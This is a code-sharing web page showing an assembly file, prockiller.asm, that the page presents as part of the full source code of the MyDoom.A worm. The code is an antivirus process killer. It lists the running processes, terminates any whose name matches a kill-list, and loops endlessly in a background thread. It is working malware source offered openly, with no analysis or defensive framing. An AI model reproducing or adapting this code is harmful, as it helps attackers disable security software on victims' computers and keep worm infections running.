📄 prockiller.asm

📁 蠕虫mydoom.a版本的完整源代码

💻 ASM

字号:

; AV Process Killer
; #########################################################################

.code

; Scans through processes and terminates if they are in kill-list
KillProcs proc uses edi
        LOCAL   Process: PROCESSENTRY32
        LOCAL   hSnapshot: DWORD

        mov     Process.dwSize, sizeof PROCESSENTRY32
        invoke  CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
        mov     hSnapshot, eax

        invoke  Process32First, hSnapshot, addr Process
@@:
        .IF     eax
                mov     edi, offset Processes

        @next:
                invoke  StrStrI, addr Process.szExeFile, edi
                .IF     eax
                        invoke  KillProcess, Process.th32ProcessID
                .ENDIF
                mNextListEntry @next

                invoke  Process32Next, hSnapshot, addr Process
                jmp     @B
        .ENDIF

        invoke  CloseHandle, hSnapshot

        xor     eax, eax
        ret
KillProcs endp

; Process killer thread
KillProcsThread proc lpParam: DWORD
@@:
        call    KillProcs
        invoke  Sleep, PKTimeout
        jmp     @B
        xor     eax, eax
        ret
KillProcsThread endp

; Start process killer thread
StartProcessKiller proc
        LOCAL   lpThreadId: DWORD

        invoke  CreateThread, NULL, 0, offset KillProcsThread, 0, 0, addr lpThreadId
        ret
StartProcessKiller endp

💿 文件大小 56 K

👤 上传用户 smellteen

📂 所属分类汇编语言

🏷️ 相关标签

#mydoom #蠕虫 #版本 #源代码

⌨️ 快捷键说明

复制代码 Ctrl + C

搜索代码 Ctrl + F

全屏模式 F11

切换主题 Ctrl + Shift + D

显示快捷键 ?

增大字号 Ctrl + =

减小字号 Ctrl + -